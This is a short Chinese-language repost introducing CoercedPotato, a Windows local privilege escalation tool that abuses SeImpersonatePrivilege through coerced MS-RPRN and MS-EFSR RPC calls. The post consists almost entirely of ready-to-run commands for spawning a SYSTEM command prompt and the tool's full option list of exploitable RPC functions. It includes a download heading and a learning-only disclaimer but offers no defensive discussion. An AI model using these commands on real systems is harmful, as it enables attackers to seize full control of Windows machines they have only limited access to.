工具简介
工具使用
非常快速POC:
.\CoercedPotato.exe -c whoami
交互式shell的PoC:
.\CoercedPotato.exe -c cmd.exe
可以使用--help选项检查帮助消息。
CoercedPotato is an automated tool for privilege escalation exploit using SeImpersonatePrivilege or SeImpersonatePrimaryToken.
Usage: .\CoercedPotato.exe [OPTIONS]
Options:
-h,--help Print this help message and exit
-c,--command TEXT REQUIRED Program to execute as SYSTEM (i.e. cmd.exe)
-i,--interface TEXT Optionnal interface to use (default : ALL) (Possible values : ms-rprn, ms-efsr
-n,--exploitId INT Optionnal exploit ID (Only usuable if interface is defined)
-> ms-rprn :
[0] RpcRemoteFindFirstPrinterChangeNotificationEx()
[1] RpcRemoteFindFirstPrinterChangeNotification()
-> ms-efsr
[0] EfsRpcOpenFileRaw()
[1] EfsRpcEncryptFileSrv()
[2] EfsRpcDecryptFileSrv()
[3] EfsRpcQueryUsersOnFile()
[4] EfsRpcQueryRecoveryAgents()
[5] EfsRpcRemoveUsersFromFile()
[6] EfsRpcAddUsersToFile()
[7] EfsRpcFileKeyInfo() # NOT WORKING
[8] EfsRpcDuplicateEncryptionInfoFile()
[9] EfsRpcAddUsersToFileEx()
[10] EfsRpcFileKeyInfoEx() # NOT WORKING
[11] EfsRpcGetEncryptedFileMetadata()
[12] EfsRpcEncryptFileExSrv()
[13] EfsRpcQueryProtectors()
-f,--force BOOLEAN Force all RPC functions even if it says 'Exploit worked!' (Default value : false)
--interactive BOOLEAN Set wether the process should be run within the same shell or open a new window. (Default value : true)
下载地址
文章来源:潇湘信安
黑白之道发布、转载的文章中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途及盈利等目的,否则后果自行承担!
如侵权请私聊我们删文
END